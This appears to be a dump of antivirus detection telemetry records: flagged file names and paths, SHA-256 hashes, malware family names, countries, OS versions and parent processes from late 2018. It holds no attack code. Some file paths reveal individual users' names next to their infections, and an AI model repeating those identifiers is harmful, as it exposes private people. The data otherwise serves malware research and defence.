  Row(detection=Row(filename='nqcgmncz.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\nqcgmNCZ.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='9568fff25a80896239b91f314fcd03e096f718c7176ed1877b388ef4b28104b7', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T00:54:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pemetaan data ptk 2018.pif', filepath='F:\\Pemetaan Data PTK 2018\\Pemetaan Data PTK 2018.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:45:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='abbf959ac30d23cf2882ec223966b0b8c30ae85415ccfc41a5924b29cd6bd4db', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T07:15:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091226-8ea28f58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2c0bde03\\AVSCAN-20181101-090119-0AF3D2E8\\AVSCAN-20181101-091226-8EA28F58', filesize=7360000, name='TR/Crypt.ZPACK.Gen7.#M1.#R1'), hash='bef09a9e5bbfd93946aa5af7beccd1de57a27c2022b40bcfc459cf350c20a2c9', metadata=Row(cmdline=None, country='AE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:12:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='000533', filepath='./Malware_20181025/20181025_Total/000533', filesize=128000, name='DIAL/302273.#M0.#R0'), hash='edd562bd2c3fc6522698ead30edde3f9fd97c2e1bff3b4fd824cc15b8c083810', metadata=Row(cmdline=None, country='TW', os_name='Linux', os_vmajor='Ubuntu 14', os_vminor='04', parentproc=None, parentsize=None, timestamp='2018-11-01T02:23:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='colf.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SOCIO SANITARI\\COLF.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:13:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094015-ce61be38', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094015-CE61BE38', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:40:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gcaclientdll.dll', filepath='E:\\Program Files (x86)\\LANGames\\gcaclientdll.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='9a463b51b6d9cda67bd20dd63a75c22fc6f252da0b3d43386a478397bd825cc5', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-01T13:39:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='C:\\Program Files (x86)\\Common Files\\microsoft shared\\DW\\DWTRIG20.EXE', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='9cba9ef1e8dd4bb883f628fc9a51cbdbedc4ce2eb00ca42212ccce321e7d7f9e', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mobile Partner\\UpdateDog\\ouc.exe', parentsize=697184, timestamp='2018-11-01T17:14:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsy4D7D.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-01T11:30:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\2sqdxocy52f\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:59:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.vir', filepath='\\\\?\\C:\\Applications\\Service.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:29:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tutto informatica engim.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\MATERIALE DIDATTICO\\tutto informatica engim.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:30:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='umana spa project work.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CHIAVETTA TESI\\UMANA spa PROJECT WORK.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:19:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-153449-4fe7e98d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5d35357a\\AVSCAN-20181104-152801-28BE81A8\\AVSCAN-20181104-153449-4FE7E98D', filesize=896000, name='TR/Dldr.Agent.896000.#M1.#R1'), hash='38a75b7396d53b515662130fec4490c372e85cfb06b7c2082bf721c3f4e77a8a', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:34:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='91ece29a3da27d43701fc891336b2fd2cb8022cb294764307dac7c9858727486', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T20:50:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:28:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='long-ay.dll', filepath='C:\\Users\\X\\Downloads\\Long-Ay (Y 2018-11-01 E)\\Long-Ay.dll', filesize=9600000, name='HEUR/AGEN.1018653.#M1.#R1'), hash='69f33135dbafea9f932981cecccf4199c33dfebed489aa2eb10725033aef8b1c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe10_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe10 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T13:19:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\Загрузки\\Star Wolves 3 Ashes of Victory\\setup.exe', filesize=1024000, name='HEUR/AGEN.1000260.#M1.#R1'), hash='12534a4bfcc35bce8c7eb5db62d35282ce2956d26d3285ea831ba972dbe9c035', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe7_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T08:00:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='strixdrv.nsx', filepath='\\\\?\\F:\\kompyuter progr\\game\\Lineage II Rampage\\system\\strixdrv.nsx', filesize=6976000, name='HEUR/APC.#M1.#R1'), hash='aa9d553fa80595a6b9e7b4e98d241133674707db09d1b610b2386490aa7813d9', metadata=Row(cmdline=None, country='UZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:02:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='kinit.exe', filepath='F:\\Program Files\\Java\\jre6\\bin\\kinit.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='ab257ba57ad491fd1817addd8392e913d929e398ddfb850bd7b4e60a1ff85b7c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T10:49:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='troy2000.exe', filepath='j:\\ahmed\\troy2000\\Troy2000.exe', filesize=4672000, name='W32/Virut.Gen.#M1.#R1'), hash='68be0484f1036339d6ee4896328749fe1c153c3c338e30d7d661bebb4326377f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:37:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Sprint-Layout60\\layout60.exe', parentsize=3140608, timestamp='2018-11-04T18:20:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-082003-9b8a0426', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-081945-97A6A5AB\\AVSCAN-20181104-082003-9B8A0426', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:19:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='winbox.exe', filepath='D:\\winbox.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='3d6c50af69cb54c2ff8937975591890b946c4efe5fc3619ffb56093da09f95db', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T08:26:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe839_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe839 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T10:02:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-185024-2c6805c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c307778e\\AVSCAN-20181104-184833-1C4893D9\\AVSCAN-20181104-185024-2C6805C7', filesize=1792000, name='Adware/ConvertAd.90ed09.#M1.#R1'), hash='90ed09f63df7284a395ae4f3b7ac44216901c0e9ad8bb7a6c0c1c3ed5d209187', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:45:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165432-512dc35c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ebe48554\\AVSCAN-20181104-165143-387DDB14\\AVSCAN-20181104-165432-512DC35C', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:54:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:26:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:32:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-002050-a2415917', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-002050-A2415917', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:52:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sskinst.exe', filepath='E:\\ML-3470_Print\\DATA\\VECP\\VISTA_64\\sskinst.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T10:41:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='devising.exe', filepath='C:\\Program Files\\Locale\\devising.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='93901ed772329c1a7423de0f6baaf4b8a57d37e25de043795df0c3d2a043d292', metadata=Row(cmdline='-k netsvcs -p', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-04T06:41:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='logreader.exe', filepath='E:\\UFIandroid\\Advan\\!Driver & Tools\\Driver Qualcomm\\Qualcomm Driver\\QRD_USB_Drivers\\QCUSBNetworkCombo\\Qualcomm\\1072QRD\\logReader.exe', filesize=156000, name='W32/Ramnit.C.#M1.#R1'), hash='1a4418c9acc85235bcefb6826575a5e8fa2cca25fe7775cbfbfdc83b6ca7e312', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=748336, timestamp='2018-11-04T08:15:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.vir', filepath='C:\\Program Files\\KMSpico\\Service_KMS.VIR', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='--engine=2 --session-id=WzsJimFyRuiBDuuZeegJN5nPkZnpUX81m2YPgA+t --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=12095608, timestamp='2018-11-04T21:11:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d622', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d622', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:43:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f5e285faada5a54c4f3630bb1c2ccb1ccbd8ebd8', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\f5e285faada5a54c4f3630bb1c2ccb1ccbd8ebd8', filesize=320000, name='Adware/DealPly.159e9a.#M1.#R1'), hash='159e9ab107a20c0d2edb80dd825afaecb69860e7797b219ac1e8225cb6e1a455', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:46:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='disableusbwin7.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\DisableUSBWin7.exe', filesize=64000, name='TR/Siggen.cucmw.#M1.#R1'), hash='db6f79265933c5ec30247d757b221f8d5694e189970243bede519902113fc960', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:22:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T05:55:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mirzymnt.exe', filepath='\\\\?\\C:\\ProgramData\\OxqOwiO\\mIRZyMNt.exe', filesize=3000000, name='ADWARE/PullUpdate.Gen7.#M300.#R601522'), hash='abc9897f031d0676f5bf98689370cdcd56d32ec6010eb712d470a8bc9094aa58', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T13:56:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T22:48:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noceduti.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6832729\\noceduti.exe', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline='\\\\\\/mhp \\\\\\/mds \\\\\\/mnt \\\\\\/ext:pilp \\\\\\/inst_loc=360,132,646,504 \\\\\\/RSF=1500 \\\\\\/aflt=wcg_auwei_18_44_09 \\\\\\/instlref=s5  \\\\\\/noadmin \\\\\\/nochrome \\\\\\/adt=tE1L1R1V2Y1L1Qzuzy0C0ByBtD0D0AyCyDzyzz0BtAzz0DtCtTtE1L1R1V1B1Q2ZzutBtDtCzztCtCtDyEtCyDtCtByEzzyBtCyBtTtE1Q1G1Izu2Y1G1J1G1F2W1GtTtE1Q1G1I1M2YzuyD', country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6832729\\noceduti.exe', parentsize=512000, timestamp='2018-11-04T20:17:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:26:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0005422.exe', filepath='d:\\system volume information\\_restore{51d20475-b19b-4e6a-8fc3-a60e80bdc71c}\\rp12\\A0005422.exe', filesize=3200000, name='W32/Neshta.A.#M1.#R1'), hash='752e0f38a9db15c110bb90d372283e83aa56259ca3b6075f5544458f0c0be0e2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:42:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202533-4b38f7d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9a786c66\\AVSCAN-20181104-202015-215E41B1\\AVSCAN-20181104-202533-4B38F7D8', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:25:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181101-195410-a528bb03', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-195345-A1657267\\AVSCAN-20181101-195410-A528BB03', filesize=64000, name='TR/Rogue.64000.#M1.#R1'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:33:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='devcon.exe', filepath='C:\\Program Files\\PowerISO\\devcon.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='22956673e55f57557f4b8f91685a00e7fb646f87e758a3e519a1429be7289f90', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:vDT64t5uJEikjC39.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=37096, timestamp='2018-11-04T00:13:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rlistupdater', filepath='/Volumes/backup/Backups.backupdb/MacBook Pro de erly wilson/2017-09-12-235335/Erly W/Users/erlywilson/Library/Application Support/amc/helperamc.app/Contents/Resources/rlistupdater.app/Contents/MacOS/rlistupdater', filesize=204000, name='OSX/GT32SupportGeeks.owcbg.#M0.#R0'), hash='877421f09497bb504dde87c3107888c89f174b955dacb088873bf9754babe5f3', metadata=Row(cmdline=None, country='BR', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:25:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='f:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-04T09:43:21Z'), dt=datetime.date(2018, 11, 4)),
